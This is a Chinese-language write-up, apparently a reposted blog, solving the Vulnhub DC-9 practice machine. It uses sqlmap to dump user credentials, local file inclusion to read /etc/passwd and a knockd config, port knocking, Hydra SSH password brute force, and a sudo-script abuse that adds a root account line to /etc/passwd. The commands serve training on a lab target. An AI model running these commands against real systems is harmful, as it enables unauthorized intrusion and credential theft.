Vulnhub靶场 | DC系列 - DC9

2024-09-02 05:36
文章标签 系列 靶场 dc vulnhub dc9

本文主要是介绍Vulnhub靶场 | DC系列 - DC9,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

文章目录

  • DC-9
  • 环境搭建
  • 渗透测试
      • 端口敲门服务

DC-9

环境搭建

  1. 靶机镜像下载地址:https://vulnhub.com/entry/dc-6,315/
  2. 需要将靶机和 kali 攻击机放在同一个局域网里;
  3. 本实验kali 的 IP 地址:192.168.10.146。

渗透测试

使用 nmap 扫描 192.168.10.0/24 网段存活主机

┌──(root💀kali)-[~/桌面]
└─# nmap -sP 192.168.10.0/24

经判断,目标主机IP地址为192.168.10.155。

扫描开放的服务。

┌──(root💀kali)-[~/桌面]
└─# nmap -sS 192.168.10.155

注意:这里的22端口显示的是filtered。

分析下网站

这里是一些用户的信息

这里可以使用name搜索相关的信息

这里可以登录。尝试sql注入,不行。还有一个思路,前面有各种用户的信息,可以尝试组成社工字典进行爆破(这个放到没有利用点的时候再尝试)

经测试,搜索页是存在sql注入的。

直接上sqlmap吧~

因为是post注入,所以先使用BurpSuite抓取一下数据包。

将请求内容放入到dc9文件中之后运行sqlmap

┌──(root💀kali)-[~/桌面]
└─# sqlmap -r ./dc9 -p search --batch
┌──(root💀kali)-[~/桌面]
└─# sqlmap -r ./dc9 -p search --batch --dbs
available databases [3]:
[*] information_schema
[*] Staff
[*] users
┌──(root💀kali)-[~/桌面]
└─# sqlmap -r ./dc9 -p search --batch --current-db
current database: 'Staff'
┌──(root💀kali)-[~/桌面]
└─# sqlmap -r ./dc9 -p search --batch -D Staff --tables
Database: Staff
[2 tables]
+--------------+
| StaffDetails |
| Users        |
+--------------+
┌──(root💀kali)-[~/桌面]
└─# sqlmap -r ./dc9 -p search --batch -D Staff -T Users --columns
Database: Staff
Table: Users
[3 columns]
+----------+-----------------+
| Column   | Type            |
+----------+-----------------+
| Password | varchar(255)    |
| UserID   | int(6) unsigned |
| Username | varchar(255)    |
+----------+-----------------+
┌──(root💀kali)-[~/桌面]
└─# sqlmap -r ./dc9 -p search --batch -D Staff -T Users -C Username,Password --dump
Database: Staff
Table: Users
[1 entry]
+----------+--------------------------------------------------+
| Username | Password                                         |
+----------+--------------------------------------------------+
| admin    | 856f5de590ef37314e7c3bdf6f8a66dc (transorbital1) |
+----------+--------------------------------------------------+

使用admin:transorbital1 登录成功。

这个页面下面提示“File does not exist”,猜测这里存在文件包含。

猜测参数为file,读取下passwd文件试试:

http://192.168.10.155/manage.php?file=../../../../etc/passwd

读取成功,这里存在本地文件包含。

尝试了下远程文件包含,不行~

端口敲门服务

knockd配置位置/etc/knockd.conf。

http://192.168.10.155/manage.php?file=../../../../etc/knockd.conf

敲门顺序 sequence = 7469,8475,9842。

安装knock工具,对获取的端口(开门密码)实现碰撞,可以看到成功开启了ssh端口:

apt install knockd
knock 192.168.10.155 7469 8475 9842

或者使用nc进行依次连接也可

┌──(root💀kali)-[~/桌面]
└─# nc 192.168.10.155 7469 ┌──(root💀kali)-[~/桌面]
└─# nc 192.168.10.155 8475 ┌──(root💀kali)-[~/桌面]
└─# nc 192.168.10.155 9842 

再次进行扫描,会发现22端口是open状态。

使用sql注入漏洞获取users库中的UserDetails表中的数据

┌──(root💀kali)-[~/桌面]
└─# sqlmap -r ./dc9 -p search --batch -D users -T UserDetails -C username,password --dump

将username 列放入username.txt中,password放入到password.txt中。

┌──(root💀kali)-[~/桌面]
└─# cat a.txt  

┌──(root💀kali)-[~/桌面]
└─# awk -F "|" '{print $2}' a.txt > username.txt ┌──(root💀kali)-[~/桌面]
└─# awk -F "|" '{print $3}' a.txt > password.txt

去除一下前后的空格。

┌──(root💀kali)-[~/桌面]
└─# vim username.txt 
:%s/ //g
%是整个缓冲数据,即整个文本
s/查找的字符/替换的字符/
g是全部替换

对ssh服务进行密码爆破。

┌──(root💀kali)-[~/桌面]
└─# hydra -L username.txt -P password.txt 192.168.10.155 ssh

[DATA] attacking ssh://192.168.10.155:22/
[22][ssh] host: 192.168.10.155   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.10.155   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.10.155   login: janitor   password: Ilovepeepee

使用三个用户登录,进行信息收集。在janitor的家目录下发现隐藏目录,其中的文件是一个密码文件。

janitor@dc-9:~$ ls -a
.  ..  .bash_history  .gnupg  .secrets-for-putin
janitor@dc-9:~$ cat .secrets-for-putin/passwords-found-on-post-it-notes.txt 
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts

把密码放入刚才的密码文件中,再次爆破一下。

多了一个账号:登录一下

login: fredf   password: B4-Tru3-001
┌──(root💀kali)-[~/桌面]
└─# ssh fredf@192.168.10.155fredf@dc-9:~$ 

查看sudo授权,有一个授权~

执行以下该脚本,sudo /opt/devstuff/dist/test/test

提示 python test.py。

/opt/devstuff/中找到了test.py文件,查看文件内容。

分析含义:需要三个参数,如果不是3则输出“Usage:…”,满足3个参数,则第2个参数的文件内容写入到第3个参数的文件中。

思路:

  • 1、首先/opt/devstuff/dist/test/test可以以root身份运行
  • 2、构造有root权限的账户放入到/etc/passwd中
  • 3、以该用户登录系统

使用openssl passwd 生成密码

┌──(root💀kali)-[~/桌面]
└─# openssl passwd 123456
bwfgXppOVV0PI

编写a.txt文件

fredf@dc-9:~$ vi a.txt 
hackerx:bwfgXppOVV0PI:0:0::/root:/bin/bash

将a.txt文件写入到/etc/passwd文件中

fredf@dc-9:~$ sudo /opt/devstuff/dist/test/test a.txt /etc/passwd

切换到新添加的hackerx用户

拿到flag

参考链接:

  • https://blog.csdn.net/qq_61237064/article/details/123772725
  • https://blog.csdn.net/Aluxian_/article/details/124240789
  • https://zhuanlan.zhihu.com/p/59488488
  • https://blog.csdn.net/weixin_46706771/article/details/119880428
  • https://blog.csdn.net/qq_41631806/article/details/105361868

这篇关于Vulnhub靶场 | DC系列 - DC9的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1129138

相关文章

Spring Security 从入门到进阶系列教程

Spring Security 入门系列 《保护 Web 应用的安全》 《Spring-Security-入门(一):登录与退出》 《Spring-Security-入门(二):基于数据库验证》 《Spring-Security-入门(三):密码加密》 《Spring-Security-入门(四):自定义-Filter》 《Spring-Security-入门(五):在 Sprin

科研绘图系列:R语言扩展物种堆积图(Extended Stacked Barplot)

介绍 R语言的扩展物种堆积图是一种数据可视化工具,它不仅展示了物种的堆积结果,还整合了不同样本分组之间的差异性分析结果。这种图形表示方法能够直观地比较不同物种在各个分组中的显著性差异,为研究者提供了一种有效的数据解读方式。 加载R包 knitr::opts_chunk$set(warning = F, message = F)library(tidyverse)library(phyl

【生成模型系列(初级)】嵌入(Embedding)方程——自然语言处理的数学灵魂【通俗理解】

【通俗理解】嵌入(Embedding)方程——自然语言处理的数学灵魂 关键词提炼 #嵌入方程 #自然语言处理 #词向量 #机器学习 #神经网络 #向量空间模型 #Siri #Google翻译 #AlexNet 第一节:嵌入方程的类比与核心概念【尽可能通俗】 嵌入方程可以被看作是自然语言处理中的“翻译机”,它将文本中的单词或短语转换成计算机能够理解的数学形式,即向量。 正如翻译机将一种语言

BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

目录   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 [web][HCTF 2018]admin 考点:弱密码字典爆破 四种方法:   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 访问环境 老规矩,我们先查看源代码

flume系列之:查看flume系统日志、查看统计flume日志类型、查看flume日志

遍历指定目录下多个文件查找指定内容 服务器系统日志会记录flume相关日志 cat /var/log/messages |grep -i oom 查找系统日志中关于flume的指定日志 import osdef search_string_in_files(directory, search_string):count = 0

GPT系列之:GPT-1,GPT-2,GPT-3详细解读

一、GPT1 论文:Improving Language Understanding by Generative Pre-Training 链接:https://cdn.openai.com/research-covers/languageunsupervised/language_understanding_paper.pdf 启发点:生成loss和微调loss同时作用,让下游任务来适应预训

Java基础回顾系列-第七天-高级编程之IO

Java基础回顾系列-第七天-高级编程之IO 文件操作字节流与字符流OutputStream字节输出流FileOutputStream InputStream字节输入流FileInputStream Writer字符输出流FileWriter Reader字符输入流字节流与字符流的区别转换流InputStreamReaderOutputStreamWriter 文件复制 字符编码内存操作流(

Java基础回顾系列-第五天-高级编程之API类库

Java基础回顾系列-第五天-高级编程之API类库 Java基础类库StringBufferStringBuilderStringCharSequence接口AutoCloseable接口RuntimeSystemCleaner对象克隆 数字操作类Math数学计算类Random随机数生成类BigInteger/BigDecimal大数字操作类 日期操作类DateSimpleDateForma

Java基础回顾系列-第三天-Lambda表达式

Java基础回顾系列-第三天-Lambda表达式 Lambda表达式方法引用引用静态方法引用实例化对象的方法引用特定类型的方法引用构造方法 内建函数式接口Function基础接口DoubleToIntFunction 类型转换接口Consumer消费型函数式接口Supplier供给型函数式接口Predicate断言型函数式接口 Stream API 该篇博文需重点了解:内建函数式

Java基础回顾系列-第二天-面向对象编程

面向对象编程 Java类核心开发结构面向对象封装继承多态 抽象类abstract接口interface抽象类与接口的区别深入分析类与对象内存分析 继承extends重写(Override)与重载(Overload)重写(Override)重载(Overload)重写与重载之间的区别总结 this关键字static关键字static变量static方法static代码块 代码块String类特